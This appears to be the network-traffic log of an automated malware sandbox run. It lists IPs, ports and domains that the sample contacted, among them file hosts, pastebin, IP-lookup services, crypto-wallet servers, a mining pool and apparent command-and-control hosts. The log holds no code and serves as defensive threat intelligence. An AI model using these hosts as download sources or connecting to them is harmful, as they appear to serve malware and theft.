CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 153.141.79.40.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.77:22888 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 77.94.49.194.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.tecverse.xyz udp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
US 194.49.94.152:50500 tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 files.catbox.moe udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 188.114.96.0:443 yip.su tcp
US 172.67.34.170:443 pastebin.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
MY 111.90.146.230:80 tcp
US 8.8.8.8:53 sl.himanfast.com udp
US 188.114.96.0:80 sl.himanfast.com tcp
US 8.8.8.8:53 gobo25cl.top udp
US 8.8.8.8:53 thecrazymonkey.org udp
US 104.21.92.178:80 gobo25cl.top tcp
US 104.21.92.178:443 gobo25cl.top tcp
US 8.8.8.8:53 redirector.pm udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
US 194.49.94.85:443 redirector.pm tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
BG 91.92.243.139:80 91.92.243.139 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 178.92.21.104.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 pastebin.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.34.170:443 pastebin.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 flyawayaero.net udp
US 104.21.92.178:80 gobo25cl.top tcp
US 104.21.92.178:443 gobo25cl.top tcp
US 194.49.94.85:443 redirector.pm tcp
US 172.67.216.81:443 flyawayaero.net tcp
US 8.8.8.8:53 potatogoose.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 northmuyaspropertyinvestment.com udp
US 104.21.35.235:443 potatogoose.com tcp
BG 91.92.243.139:80 91.92.243.139 tcp
TR 78.135.105.12:443 northmuyaspropertyinvestment.com tcp
US 194.49.94.152:50500 tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 235.35.21.104.in-addr.arpa udp
US 188.114.97.0:80 sl.himanfast.com tcp
US 188.114.96.0:443 sl.himanfast.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 12.105.135.78.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 44.198.246.147:587 mail.pharmapanel.com.ar tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 www.hreeremaeps.com udp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 147.246.198.44.in-addr.arpa udp
US 172.67.194.188:443 iplogger.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 download.opera.com udp
US 8.8.8.8:53 188.194.67.172.in-addr.arpa udp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.shopbons-mall.com udp
US 194.49.94.152:50500 tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 t.me udp
NL 185.26.182.122:443 download.opera.com tcp
NL 149.154.167.99:443 t.me tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 122.182.26.185.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 34.120.175.65:80 www.333vvs.com tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.113:80 194.49.94.113 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 113.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.nnxh.net udp
HK 154.216.129.246:80 www.nnxh.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 246.129.216.154.in-addr.arpa udp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
DE 195.201.255.35:443 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 78.132.240.87.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.pdian.link udp
US 13.107.43.13:443 onedrive.live.com tcp
US 194.49.94.152:50500 tcp
N/A 127.0.0.1:30 icmp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 149.154.167.99:443 t.me tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
DE 195.201.255.35:443 tcp
DE 195.201.255.35:443 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.antsnav.com udp
US 188.114.96.0:80 www.antsnav.com tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.rubesste.com udp
US 167.172.228.26:80 www.rubesste.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 26.228.172.167.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
RU 185.172.128.100:80 185.172.128.100 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 www.onlygiftkits.com udp
CA 23.227.38.74:80 www.onlygiftkits.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 74.38.227.23.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.cmmug.asia udp
US 188.114.96.9:80 www.cmmug.asia tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 9.96.114.188.in-addr.arpa udp
US 194.49.94.152:50500 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 service-domain.xyz udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 3.80.150.121:443 service-domain.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 202.23.217.172.in-addr.arpa udp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.irmaosconstrusilva.store udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 gservicese.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.a0zu3im002.cfd udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.ricohdealers.com udp
US 216.244.107.100:80 www.ricohdealers.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.stericyclehq.com udp
US 8.8.8.8:53 t.me udp
US 63.141.242.46:80 www.stericyclehq.com tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 100.107.244.216.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.ljwixsb.top udp
DE 195.201.255.35:443 tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
BG 91.92.243.151:80 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
TR 185.216.70.235:80 185.216.70.235 tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 235.70.216.185.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.67:80 vk.com tcp
DE 195.201.255.35:443 tcp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:443 vk.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 8.8.8.8:53 67.132.240.87.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.albertcolet.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.248.169.48:80 www.saferspaces.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 api.check-data.xyz udp
US 8.8.8.8:53 www.testupdate.info udp
US 44.236.198.167:443 api.check-data.xyz tcp
KZ 185.22.66.224:80 www.testupdate.info tcp
KZ 185.22.66.224:80 www.testupdate.info tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
US 8.8.8.8:53 16.43.107.13.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients16.google.com udp
US 8.8.8.8:53 rfiles4.tracemonitors.com udp
US 8.8.8.8:53 clients79.google.com udp
RU 80.78.240.92:443 rfiles4.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles4.tracemonitors.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 224.66.22.185.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
US 44.236.198.167:443 api.check-data.xyz tcp
KZ 185.22.66.224:80 www.testupdate.info tcp
US 8.8.8.8:53 api5.check-data.xyz udp
KZ 185.22.66.224:80 www.testupdate.info tcp
KZ 185.22.66.224:80 www.testupdate.info tcp
US 44.236.198.167:443 api5.check-data.xyz tcp
US 194.49.94.152:50500 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
DE 172.217.23.195:443 ssl.gstatic.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 server1.dumperstats.org udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 195.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients16.google.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 clients79.google.com udp
BG 185.82.216.111:443 server1.dumperstats.org tcp
FI 64.233.164.127:19302 stun1.l.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 walkinglate.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 files.catbox.moe udp
US 13.107.43.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
NL 167.172.42.31:50001 tcp
US 8.8.8.8:53 electrum.hsmiths.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
SE 45.154.252.104:50001 electrum.hsmiths.com tcp
US 8.8.8.8:53 31.42.172.167.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
US 8.8.8.8:53 ex03.axalgo.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
CZ 37.205.9.165:50002 tcp
US 8.8.8.8:53 clients93.google.com udp
US 8.8.8.8:53 rfiles2.tracemonitors.com udp
US 8.8.8.8:53 rfiles3.tracemonitors.com udp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
US 8.8.8.8:53 clients2.google.com udp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 142.251.36.46:443 clients2.google.com tcp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 46.36.251.142.in-addr.arpa udp
NL 172.217.168.202:443 content-autofill.googleapis.com tcp
NL 172.217.168.202:443 content-autofill.googleapis.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 202.168.217.172.in-addr.arpa udp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 172.217.23.195:443 ssl.gstatic.com tcp
US 142.93.6.38:50001 tcp
NL 142.251.36.14:443 play.google.com tcp
US 142.93.6.38:50001 tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 38.6.93.142.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
SG 139.59.232.148:50002 tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 148.232.59.139.in-addr.arpa udp
US 188.114.97.0:80 walkinglate.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients93.google.com udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 clients12.google.com udp
US 8.8.8.8:53 api2.tracemonitors.com udp
DE 45.76.89.70:3333 pool.hashvault.pro tcp
US 44.240.219.117:443 api2.tracemonitors.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 117.219.240.44.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.68.143:443 pastebin.com tcp
US 188.114.97.0:443 yip.su tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.47:80 194.49.94.47 tcp
US 8.8.8.8:53 gobo25cl.top udp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 flyawayaero.net udp
US 172.67.197.19:80 gobo25cl.top tcp
US 8.8.8.8:53 redirector.pm udp
US 8.8.8.8:53 www.pdian.link udp
US 104.21.93.225:443 flyawayaero.net tcp
US 172.67.197.19:443 gobo25cl.top tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 rawcracker.com udp
US 172.67.180.173:443 potatogoose.com tcp
US 194.49.94.85:443 redirector.pm tcp
US 8.8.8.8:53 net.geo.opera.com udp
US 188.114.96.0:443 rawcracker.com tcp
BG 91.92.243.139:80 91.92.243.139 tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 8.8.8.8:53 bobkelsofan.com udp
US 8.8.8.8:53 check.graspalace.com udp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 104.21.27.119:443 bobkelsofan.com tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 iplogger.com udp
US 188.114.96.0:80 check.graspalace.com tcp
US 104.21.12.138:443 iplogger.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 clients93.google.com udp
US 8.8.8.8:53 clients12.google.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 133455789.xyz udp
RU 194.67.87.38:80 133455789.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 rfiles5.tracemonitors.com udp
US 13.107.43.13:443 onedrive.live.com tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
US 8.8.8.8:53 www.ljwixsb.top udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
RU 194.67.87.38:80 133455789.xyz tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
RU 194.67.87.38:80 133455789.xyz tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.mobdigim.com udp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.163:443 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
RU 91.215.85.63:2718 gservicese.com tcp
US 8.8.8.8:53 t.me udp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 149.154.167.99:443 t.me tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients12.google.com udp
DE 195.201.255.35:443 tcp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 clients93.google.com udp
DE 195.201.255.35:443 tcp
